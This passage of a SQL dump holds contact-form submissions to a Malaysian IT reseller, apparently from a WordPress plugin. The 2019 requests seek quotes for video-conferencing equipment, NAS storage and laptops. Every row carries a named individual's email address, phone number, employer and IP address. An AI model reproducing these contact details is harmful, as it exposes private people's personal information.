digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"00\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-20 09:05:30','210.186.80.103','1'),(198,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Eddie Teong\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"eddie.teong@fajarbaru.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"60378049698\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Fajarbaru Builder Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:217:\"Dear Sir / Madam, We would like to explore with video conference system for meeting room not more than 10 persons. We would be appreciated if you could email us the relevant information. Thank you. Best regards, Eddie\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"78\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-20 16:15:36','202.184.161.175','1'),(199,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Winnie Chua\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"winnie.chua@aeonretail.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0173763112\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"AEON Co M Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:46:\"I would like to rent the Conference facilities\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"22\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-23 08:11:47','121.123.157.150','1'),(200,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Nizam Shariff\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"hazeelinizam.shariff@mmu.edu.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0383125036\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Unitele Multimedia Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Video Conference equipment\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-23 14:04:21','203.106.67.10','1'),(201,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Yvonne Poh\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"yvonne.poh@hotmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0135558181\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Fixus Construction sdn bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Menara MBMR\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:59:\"Please send me a quote for the video conference call system\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-30 21:37:30','183.171.185.17','1'),(202,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Suhaila Sulaiman\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"suhaila.s@fgvholdings.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0129515230\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"FGV R&amp;D Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:477:\"I am surveying to setup a NAS storage in my office. I need a Synology with 24 TB storage for data, and another 24 TB storage for backup. If you provide the requested items, please send me a quotation of below item: 1. Synology DiskStation DS1819+ (1pc) 2. Seagate Ironwolf 12TB x 4pcs (total 48Tb) 3. Installation cost (if provide. if not provided, please mention in the quotation) 4. Delivery charges to Bandar Enstek, Negeri Sembilan Kindly email to suhaila.s@fgvholdings.com\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-06-02 08:34:36','183.171.77.81','1'),(203,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"kenny walter\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"kenny@bayurini.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0163029559\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"bayurini sdn bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"please contact me for palo alto lead for kota kinabalu sabah.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-06-03 17:51:11','175.141.90.129','1'),(204,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"MURRALI DHARAN A/L SANMUGAM\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"murrali82@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122670701\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"EZT\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Logitech Brio\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:123:\"Hi, we would like to have a webcam to use for meetings, video conference. We would like fix at LCD screen. Please advice us\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-06-04 18:22:09','175.139.186.149','1'),(205,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"rozuki\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"rozukie@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193198024\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"JDSB\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:39:\"Need to know about Video Conf equipment\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"23\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-06-12 16:23:52','175.142.13.185','1'),(206,6,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"57\";s:4:\"slug\";s:18:\"get-quotation-asus\";s:4:\"name\";s:20:\"Get Quotation (Asus)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"60\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Sahara Shrestha\";}i:2;a:7:{s:2:\"id\";s:2:\"61\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"sashr485@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"64\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01111968187\";}i:4;a:7:{s:2:\"id\";s:2:\"62\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"No company\";}i:5;a:7:{s:2:\"id\";s:2:\"66\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Nilai, Malaysia\";}i:6;a:7:{s:2:\"id\";s:2:\"65\";s:4:\"slug\";s:4:\"asus\";s:4:\"name\";s:4:\"Asus\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:502:\"a:19:{i:0;s:23:\"ASUS ZenBook 13 UX331UN\";i:1;s:27:\"ASUS ZenBook Flip S UX370UA\";i:2;s:28:\"ASUS Transformer Book 